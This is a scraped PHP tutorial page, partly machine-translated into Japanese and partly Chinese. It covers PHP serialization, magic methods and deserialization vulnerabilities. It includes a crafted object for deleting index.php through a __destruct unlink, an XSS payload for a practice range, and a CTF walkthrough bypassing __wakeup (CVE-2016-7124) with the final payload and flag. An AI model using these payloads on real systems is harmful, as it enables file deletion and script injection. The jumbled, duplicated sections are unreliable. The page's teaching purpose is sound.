目次
属性またはメソッドのアクセス制御
(マジックメソッド)といいます
現在のクラスにのみ制限できる場合、攻撃対象領域が小さすぎるため、他のクラスのオブジェクトを逆シリアル化しても属性を制御することしかできません。他のクラス オブジェクトのメソッドが逆シリアル化されたコードで呼び出されない場合、 、依然として脆弱性を悪用して攻撃することはできません。
とも呼ばれます) と呼ばれます。
PHP反序列化
PHP为何要序列化和反序列化
三、PHP反序列化漏洞原理
调用__destruct删除
XSS(跨站脚本攻击)攻击
四、实例
PHP反序列化绕过__wakeup() CTF例题
ホームページ バックエンド開発 PHPの問題 PHP デシリアライゼーションの脆弱性の詳細な分析

PHP デシリアライゼーションの脆弱性の詳細な分析

Apr 07, 2022 pm 12:57 PM
php

この記事は、PHP に関する関連知識を提供します。主に、PHP オブジェクト指向プログラミング、シリアル化と逆シリアル化、逆シリアル化の脆弱性の原則、その他の内容を含む、逆シリアル化の脆弱性に関する関連問題を紹介します。みんなの役に立つでしょう。

PHP デシリアライゼーションの脆弱性の詳細な分析

##推奨学習: 「

PHP ビデオ チュートリアル

1. PHP オブジェクト指向プログラミング

オブジェクト指向プログラミング (オブジェクト指向プログラミング、OOP)、

オブジェクトは、情報とその情報の処理の記述によって表現される全体です。構図は現実世界を抽象化したものです。

クラス

は、同じ構造と動作を共有するオブジェクト のコレクションです。各クラスの定義はキーワード class で始まり、その後にクラス名が続きます。 PHP クラスを作成します:

<?php
class TestClass //定义一个类
{
//一个变量
public $variable = &#39;This is a string&#39;;
//一个方法
public function PrintVariable()
{
echo $this->variable;
}
}
//创建一个对象
$object = new TestClass();
//调用一个方法
$object->PrintVariable();
?>
ログイン後にコピー
public、protected、private

PHP

属性またはメソッドのアクセス制御

は、先頭に # を追加することによって行われます ##キーワード

パブリック (public)、プロテクト (protected)、またはプライベート (private) を実現します。 public (public): パブリック クラス メンバーには、どこからでも アクセスできます。

protected (保護された): 保護されたクラス メンバーは、それ自体、そのサブクラス、親クラスから アクセスできます。

private (プライベート): プライベート クラス メンバー

には、それが定義されているクラスからのみ アクセスできます。

注:

アクセス制御修飾子が異なると、以下に示すように、シリアル化後の属性の長さと属性値が異なります。 public: 属性はシリアル化されます。属性値がシリアル化されると、属性値は

属性名

になります: 属性がシリアル化されると、属性値は

\x00*\x00属性名##になります

#private: 属性がシリアル化されると、属性値は \x00 クラス名\x00 属性名

になります。ここで: \x00

は空文字 を意味しますが、次の例のように 1 文字位置 (スペース) を占有します。

<?phpclass People{
    public $id;
    protected $gender;
    private $age;
    public function __construct(){
        $this->id = 'Hardworking666';
        $this->gender = 'male';
        $this->age = '18';
    }}$a = new People();echo serialize($a);?>
ログイン後にコピー
O:6:"People":3:{s:2:"id";s:14:"Hardworking666";s:9:" * gender";s:4:"male";s:11:" People age";s:2:"18";}
ログイン後にコピー
マジック メソッド (マジック関数)

# で 2 つのアンダースコアを配置します。 ## PHPでは #で始まるメソッドを

マジックメソッド

(マジックメソッド)といいます

PHP公式——マジックメソッド16の詳しい説明PHP のマジック メソッド クラスにはいくつかの特別な関数が含まれる場合があります。マジック関数は、特定の状況下で を自動的に呼び出します。

__construct()            //类的构造函数,创建对象时触发

__destruct()             //类的析构函数,对象被销毁时触发

__call()                 //在对象上下文中调用不可访问的方法时触发

__callStatic()           //在静态上下文中调用不可访问的方法时触发

__get()                  //读取不可访问属性的值时,这里的不可访问包含私有属性或未定义

__set()                  //在给不可访问属性赋值时触发

__isset()                //当对不可访问属性调用 isset() 或 empty() 时触发

__unset()                //在不可访问的属性上使用unset()时触发

__invoke()               //当尝试以调用函数的方式调用一个对象时触发

__sleep()                //执行serialize()时,先会调用这个方法

__wakeup()               //执行unserialize()时,先会调用这个方法

__toString()             //当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用
ログイン後にコピー
serialize() 関数は、クラスにマジック メソッドが存在するかどうかを確認します。存在する場合、このメソッドが最初に呼び出され、次にシリアル化操作が実行されます。

5 つのマジック メソッドに注目する必要があるので、もう一度強調します。

__construct: オブジェクト の作成時に呼び出されるコンストラクター

__destruct

: オブジェクト

が破棄されるときに呼び出されるデストラクター __toString

: オブジェクト

が使用されるとき文字列として扱われる場合 __sleep

: オブジェクト

がシリアル化されると __wakeup# が呼び出されます ##: オブジェクト再び起動します。つまり、

はバイナリ文字列からオブジェクト

に再構築されます (オブジェクトが デシリアライズされる ときに呼び出されます) シリアル化から これらの関数の実行プロセス逆シリアル化するのは次のとおりです:

__construct() ->__sleep() -> __wakeup() ->

__toString ()

->

__destruct()

<div class="code" style="position:relative; padding:0px; margin:0px;"><pre class="brush:php;toolbar:false">&lt;?php class TestClass { //一个变量 public $variable = &amp;#39;This is a string&amp;#39;; //一个方法 public function PrintVariable() { echo $this-&gt;variable.'&lt;br /&gt;';     }     //构造函数     public function  __construct()     {         echo '__construct&lt;br /&gt;';     }     //析构函数     public function __destruct()     {         echo '__destruct&lt;br /&gt;';     }     //当对象被当作一个字符串     public function __toString()     {         return '__toString&lt;br /&gt;';     } } //创建一个对象 //__construct会被调用 $object = new TestClass(); //创建一个方法 //‘This is a string’将会被输出 $object-&gt;PrintVariable(); //对象被当作一个字符串 //toString会被调用 echo $object; //php脚本要结束时,__destruct会被调用 ?&gt;</pre><div class="contentsignin">ログイン後にコピー</div></div>出力結果: <div class="code" style="position:relative; padding:0px; margin:0px;"><pre class="brush:php;toolbar:false">__construct This is a string __toString __destruct</pre><div class="contentsignin">ログイン後にコピー</div></div>__toString()要素が多すぎるため、このマジック メソッドをトリガーするため、それらをリストする必要があります: <div class="code" style="position:relative; padding:0px; margin:0px;"><pre class="brush:php;toolbar:false">1.  echo($obj)/print($obj)打印时会触发  2.  反序列化对象与字符串连接时  3.  反序列化对象参与格式化字符串时  4.  反序列化对象与字符串进行==比较时(PHP进行==比较的时候会转换参数类型)  5.  反序列化对象参与格式化SQL语句,绑定参数时  6.  反序列化对象在经过php字符串处理函数,如strlen()、strops()、strcmp()、addslashes()等  7.  在in_array()方法中,第一个参数时反序列化对象,第二个参数的数组中有__toString()返回的字符串的时候__toString()会被调用  8.  反序列化的对象作为class_exists()的参数的时候</pre><div class="contentsignin">ログイン後にコピー</div></div>逆シリアル化攻撃におけるマジック メソッドの役割逆シリアル化への入り口は

unserialize()

です。

パラメータが制御可能であり、このクラスが現在のスコープ内に存在する限り、

関数クラスの unserialize()Object に限定されるのではなく、任意のシリアル化されたオブジェクトを渡すことができます。

現在のクラスにのみ制限できる場合、攻撃対象領域が小さすぎるため、他のクラスのオブジェクトを逆シリアル化しても属性を制御することしかできません。他のクラス オブジェクトのメソッドが逆シリアル化されたコードで呼び出されない場合、 、依然として脆弱性を悪用して攻撃することはできません。

ただし、マジック メソッドを使用すると、攻撃対象領域を拡大できます。マジック メソッドは、クラスのシリアル化または逆シリアル化中に自動的に完了するため、逆シリアル化でオブジェクトのプロパティを使用して操作できます。攻撃目的を達成するための悪用可能な機能次の例を通じて、逆シリアル化の脆弱性におけるマジック メソッドの役割を理解します。コードは次のとおりです: 2. PHP のシリアル化と逆シリアル化

PHP のシリアル化

ネットワーク経由でオブジェクトを送信する必要がある場合があります。送信を容易にするために、 オブジェクト全体をバイナリ文字列 に変換し、データが到達したときに元のオブジェクトに復元します。このプロセスは

Serialization

(

Serialization

とも呼ばれます) と呼ばれます。

json数据使用 , 分隔开,数据内使用 : 分隔

json数据其实就是个数组,这样做的目的也是为了方便在前后端传输数据,后端接受到json数据,可以通过json_decode()得到原数据,
这种将原本的数据通过某种手段进行"压缩",并且按照一定的格式存储的过程就可以称之为序列化。

有两种情况必须把对象序列化:
把一个对象在网络中传输
把对象写入文件或数据库

相关概念可以参考我以前的文章:
Python序列化与反序列化详解(包括json和json模块详解)

PHP序列化:把对象转化为二进制的字符串,使用serialize()函数
PHP反序列化:把对象转化的二进制字符串再转化为对象,使用unserialize()函数

通过例子来看PHP序列化后的格式:

<?php
class User
{
    //类的数据
    public $age = 0;
    public $name = &#39;&#39;;
    //输出数据
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.' is '.$this->age.' years old.<br />';
    } // “.”表示字符串连接
}
//创建一个对象
$usr = new User();
//设置数据
$usr->age = 18;
$usr->name = 'Hardworking666';
//输出数据
$usr->printdata();
//输出序列化后的数据
echo serialize($usr)
?>
ログイン後にコピー

输出结果:

User Hardworking666 is 18 years old.
O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}
ログイン後にコピー

下面的 O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";} 就是对象user序列化后的形式。

“O”表示对象,“4”表示对象名长度为4,“User”为对象名,“2”表示有2个参数

“{}”里面是参数的key和value,

“s”表示string对象,“3”表示长度,“age”则为key;“i”是interger(整数)对象,“18”是value,后面同理。

序列化格式:

a - array 数组型
b - boolean 布尔型
d - double 浮点型
i - integer 整数型
o - common object 共同对象
r - objec reference 对象引用
s - non-escaped binary string 非转义的二进制字符串
S - escaped binary string 转义的二进制字符串
C - custom object 自定义对象
O - class 对象
N - null 空
R - pointer reference 指针引用
U - unicode string Unicode 编码的字符串
ログイン後にコピー

PHP序列化需注意以下几点:

1、序列化只序列属性,不序列方法
2、因为序列化不序列方法,所以反序列化之后如果想正常使用这个对象的话我们必须要依托这个类要在当前作用域存在的条件
3、我们能控制的只有类的属性,攻击就是寻找合适能被控制的属性,利用作用域本身存在的方法,基于属性发动攻击

PHP反序列化

对上例进行反序列化:

<?php
class User
{
    //类的数据
    public $age = 0;
    public $name = &#39;&#39;;
    //输出数据
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.' is '.$this->age.' years old.<br />';
    }
}
//重建对象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}');
//输出数据
$usr->printdata();
?>
ログイン後にコピー
User Hardworking666 is 18 years old.
ログイン後にコピー

_sleep 方法在一个对象被序列化时调用,_wakeup方法在一个对象被反序列化时调用

<?phpclass test{
    public $variable = &#39;变量反序列化后都要销毁&#39;; //公共变量
    public $variable2 = &#39;OTHER&#39;;
    public function printvariable()
    {
        echo $this->variable.'<br />';
    }
    public function __construct()
    {
        echo '__construct'.'<br />';
    }
    public function __destruct()
    {
        echo '__destruct'.'<br />';
    }
    public function __wakeup()
    {
        echo '__wakeup'.'<br />';
    }
    public function __sleep()
    {
        echo '__sleep'.'<br />';
        return array('variable','variable2');
    }}//创建一个对象,回调用__construct$object = new test();
    //序列化一个对象,会调用__sleep$serialized = serialize($object);
    //输出序列化后的字符串print 'Serialized:'.$serialized.'<br />';
    //重建对象,会调用__wakeup$object2 = unserialize($serialized);
    //调用printvariable,会输出数据(变量反序列化后都要销毁)$object2->printvariable();
    //脚本结束,会调用__destruct?>
ログイン後にコピー
__construct
__sleep
Serialized:O:4:"test":2:{s:8:"variable";s:33:"变量反序列化后都要销毁";s:9:"variable2";s:5:"OTHER";}__wakeup
变量反序列化后都要销毁
__destruct
__destruct
ログイン後にコピー

从序列化到反序列化这几个函数的执行过程是:
__construct() ->__sleep -> __wakeup() -> __toString() -> __destruct()

PHP为何要序列化和反序列化

PHP的序列化与反序列化其实是为了解决一个问题:PHP对象传递问题

PHP对象是存放在内存的堆空间段上的,PHP文件在执行结束的时候会将对象销毁

如果刚好要用到销毁的对象,难道还要再写一遍代码?所以为了解决这个问题就有了PHP的序列化和反序列化

从上文可以发现,我们可以把一个实例化的对象长久的存储在计算机磁盘上,需要调用的时候只需反序列化出来即可使用。

三、PHP反序列化漏洞原理

序列化和反序列化本身没有问题,

但是反序列化内容用户可控

后台不正当的使用了PHP中的魔法函数,就会导致安全问题。

当传给unserialize()参数可控时,可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数。

调用__destruct删除

存在漏洞的思路:一个类用于临时将日志储存进某个文件,当__destruct被调用时,日志文件将会被删除:

//logdata.php<?phpclass logfile{
    //log文件名
    public $filename = 'error.log';
    //一些用于储存日志的代码
    public function logdata($text)
    {
        echo 'log data:'.$text.'<br />';
        file_put_contents($this->filename,$text,FILE_APPEND);
    }
    //destrcuctor 删除日志文件
    public function __destruct()
    {
        echo '__destruct deletes '.$this->filename.'file.<br />';
        unlink(dirname(__FILE__).'/'.$this->filename);
    }}?>
ログイン後にコピー

调用这个类:

<?phpinclude &#39;logdata.php&#39;class User{
    //类数据
    public $age = 0;
    public $name = &#39;&#39;;
    //输出数据
    public function printdata()
    {
        echo &#39;User &#39;.$this->name.' is'.$this->age.' years old.<br />';
    }}//重建数据$usr = unserialize($_GET['usr_serialized']);?>
ログイン後にコピー

代码$usr = unserialize($_GET['usr_serialized']);中的$_GET[‘usr_serialized’]是可控的,那么可以构造输入,删除任意文件。

如构造输入删除目录下的index.php文件:

<?php
include &#39;logdata.php&#39;;
$object = new logfile();
$object->filename = 'index.php';
echo serialize($object).'<br />';
?>
ログイン後にコピー

上面展示了由于输入可控造成的__destruct函数删除任意文件,其实问题也可能存在于__wakeup__sleep__toString等其他magic函数。

比如,某用户类定义了一个__toString,为了让应用程序能够将类作为一个字符串输出(echo $object),而且其他类也可能定义了一个类允许__toString读取某个文件。

XSS(跨站脚本攻击)攻击

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

例如,皮卡丘靶场PHP反序列化漏洞

$html=";
if(isset($_POST['o'])){    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){        $html.="<p>错误输出</p>";
    }else{        $html.="<p>{$unser->test)</p>";
    }
ログイン後にコピー

为了执行<script>alert('xss')</script>,Payload:

O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
ログイン後にコピー

其他知识点:

unserialize漏洞依赖条件
1、unserialize函数的参数可控
2、脚本中存在一个构造函数(__construct())、析构函数(__destruct())、__wakeup()函数中有向PHP文件中写数据的操作类
3、所写的内容需要有对象中的成员变量的值

防范方法
1、严格控制unserialize函数的参数,坚持用户所输入的信息都是不可靠的原则
2、对于unserialize后的变量内容进行检查,以确定内容没有被污染

四、实例

PHP反序列化绕过__wakeup() CTF例题

攻防世界xctf web unserialize3

打开网址后的代码:

class xctf{public $flag = '111';public function __wakeup(){exit('bad requests');}?code=
ログイン後にコピー

已知在使用 unserialize() 反序列化时会先调用 __wakeup()函数,

而本题的关键就是如何 绕过 __wakeup()函数,就是 在反序列化的时候不调用它

序列化的字符串中的 属性值 个数 大于 属性个数 就会导致反序列化异常,从而绕过 __wakeup()

代码中的__wakeup()方法如果使用就是和unserialize()反序列化函数结合使用的
这里没有特别对哪个字符串序列化,所以把xctf类实例化后,进行反序列化。

我们利用php中的new运算符,实例化类xctf。

new 是申请空间的操作符,一般用于类。
比如定义了一个 class a{public i=0;}
$c = new a(); 相当于定义了一个基于a类的对象,这时候 $c->i 就是0

构造序列化的代码在编辑器内执行:

<?php
class xctf{
public $flag = &#39;111&#39;; //public定义flag变量公开可见
public function __wakeup(){
exit(&#39;bad requests&#39;);
}
}//题目少了一个},这里补上
$a=new xctf();
echo(serialize($a));
?>
ログイン後にコピー

运行结果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}
ログイン後にコピー

序列化返回的字符串格式:

O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}
ログイン後にコピー

O:表示序列化的是对象
<length>:表示序列化的类名称长度
<class name>:表示序列化的类的名称
<n>:表示被序列化的对象的属性个数
<field name 1>:属性名
<field value 1>:属性值

所以要修改属性值<n>,既把1改为2以上。

O:4:"xctf":2:{s:4:"flag";s:3:"111";}
ログイン後にコピー

在url中输入:

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
ログイン後にコピー

得到flag:cyberpeace{d0e4287c414858ea80e166dbdb75519e}

漏洞:
__wakeup绕过(CVE-2016-7124)
CVE-2016-7124:当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

官方给出的影响版本:
PHP5 < 5.6.25
PHP7 < 7.0.10

推荐学习:《PHP教程

以上がPHP デシリアライゼーションの脆弱性の詳細な分析の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

CakePHP プロジェクトの構成 CakePHP プロジェクトの構成 Sep 10, 2024 pm 05:25 PM

この章では、CakePHP の環境変数、一般設定、データベース設定、電子メール設定について理解します。

Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド Dec 24, 2024 pm 04:42 PM

PHP 8.4 では、いくつかの新機能、セキュリティの改善、パフォーマンスの改善が行われ、かなりの量の機能の非推奨と削除が行われています。 このガイドでは、Ubuntu、Debian、またはその派生版に PHP 8.4 をインストールする方法、または PHP 8.4 にアップグレードする方法について説明します。

CakePHP の日付と時刻 CakePHP の日付と時刻 Sep 10, 2024 pm 05:27 PM

Cakephp4 で日付と時刻を操作するには、利用可能な FrozenTime クラスを利用します。

CakePHP ファイルのアップロード CakePHP ファイルのアップロード Sep 10, 2024 pm 05:27 PM

ファイルのアップロードを行うには、フォーム ヘルパーを使用します。ここではファイルアップロードの例を示します。

CakePHP ルーティング CakePHP ルーティング Sep 10, 2024 pm 05:25 PM

この章では、ルーティングに関連する次のトピックを学習します。

CakePHP について話し合う CakePHP について話し合う Sep 10, 2024 pm 05:28 PM

CakePHP は、PHP 用のオープンソース フレームワークです。これは、アプリケーションの開発、展開、保守をより簡単にすることを目的としています。 CakePHP は、強力かつ理解しやすい MVC のようなアーキテクチャに基づいています。モデル、ビュー、コントローラー

CakePHP データベースの操作 CakePHP データベースの操作 Sep 10, 2024 pm 05:25 PM

CakePHP でデータベースを操作するのは非常に簡単です。この章では、CRUD (作成、読み取り、更新、削除) 操作について理解します。

CakePHP バリデータの作成 CakePHP バリデータの作成 Sep 10, 2024 pm 05:26 PM

Validator は、コントローラーに次の 2 行を追加することで作成できます。

See all articles